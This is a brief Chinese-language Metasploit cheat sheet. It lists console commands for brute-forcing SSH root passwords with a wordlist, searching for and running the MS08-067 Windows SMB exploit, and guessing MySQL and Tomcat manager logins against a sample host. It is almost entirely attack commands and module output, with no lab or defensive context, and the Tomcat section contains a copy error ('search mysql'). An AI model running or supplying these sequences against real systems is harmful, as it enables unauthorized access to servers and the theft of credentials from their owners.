SSH服務口令猜解
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.1
set USERNAME root
set PASS_FILE /root/pass.txt (字典文件)
set threads 50
run
查看漏洞利用模塊並進行探測方法:
show auxiliary、show exploits
搜索漏洞:ms08_067
msf5 > search ms08_067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf5>use exploit/windows/smb/ms08_067_netapi
show options
....
run
爆破mysql密碼:
search mysql
use auxiliary/scanner/mysql/mysql_login
show options
set RHOSTS 192.168.1.1
set user_file /root/user.txt 或者 set USERNAME root
set pass_file /root/pass.txt 或者 set pass_file /root/pass
exploit
tomcat攻擊:
search mysql
use auxiliary/scanner/http/tomcat_mgr_login
show options
set RHOSTS 192.168.1.1
set user_file /root/user.txt
set pass_file /root/pass.txt
exploit